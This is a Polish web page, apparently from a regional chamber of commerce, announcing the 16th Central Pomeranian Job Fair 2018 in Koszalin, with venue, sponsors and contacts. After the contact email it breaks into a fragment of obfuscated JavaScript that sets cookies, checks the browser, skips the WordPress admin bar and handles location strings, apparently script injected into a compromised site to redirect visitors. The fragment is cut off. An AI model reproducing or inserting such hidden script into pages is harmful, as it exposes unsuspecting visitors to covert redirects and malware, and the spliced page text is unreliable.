16. Środkowopomorskie Targi Pracy GlobalLogic  Job Fair 2018 | Północna Izba Gospodarcza w Koszalinie

Biuro Karier Politechniki Koszalińskiej zaprasza na 16. Środkowopomorskie Targi Pracy GlobalLogic  Job Fair 2018, które odbędą się 22.03.2018 r. w godz. 11:00 – 15:00 w Hali Widowiskowo – Sportowej przy ul. Śniadeckich 4 w Koszalinie.  Poprzednia edycja targów zgromadziła ponad 75 firm i instytucji rynku pracy oraz 3000 osób poszukujących zatrudnienia.

Targi Pracy mają na celu nie tylko prezentację aktualnych ofert pracy, praktyk i staży, ale także wymianę informacji dotyczących aktualnej sytuacji na rynku pracy. Do udziału w targach zachęcamy firmy poszukujące pracowników zarówno najniższego szczebla (pracowników fizycznych, produkcyjnych) jak
i specjalistów czy menadżerów. Do odwiedzenia targów zapraszamy wszystkie osoby poszukujące pracy lub planujące swoją karierę zawodową. Targi organizowane przez Biuro Karier Politechniki Koszalińskiej umożliwiają pozyskanie najzdolniejszych studentów i absolwentów dla celów rekrutacyjnych, a osobom poszukującym pracy umożliwiają zapoznanie się z systemem rekrutacji obowiązującym w danej firmie oraz dają szansę na zatrudnienie lub pozyskanie praktyki bądź stażu.

Sponsorem tytularnym tegorocznej edycji Targów Pracy jest firma GlobalLogic S.A.

Firma Kronospan sp. z o.o. uzyskała tytuł – Wiodący Partner Gospodarczy, Partnerem Honorowym 16. edycji Targów Pracy został Bank Polska Kasa Opieki S.A., ponadto firma Espersen oraz Pomorska Agencja Rozwoju Regionalnego S.A.– są tegorocznymi sponsorami strategicznymi.

Tragi swoim patronatem objęli: Prezydenci Koszalina i Słupska, Marszałek woj. zachodniopomorskiego, Północna Izba Gospodarcza oraz Koszalińska Izba Przemysłowo – Handlowa.

Więcej informacji na temat Targów Pracy oraz aktualną listę wystawców można znaleźć na stronie www.targipracy.koszalin.pl.

Zapraszamy firmy do pobrania dokumentów aplikacyjnych ze strony www.targipracy.koszalin.pl, zgłoszenia przyjmowane są do dnia 28.02.2018 r. Dodatkowych informacji udzielamy pod nr 94 348 66 76 oraz  mailowo bk@kariera.koszalin.pl 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m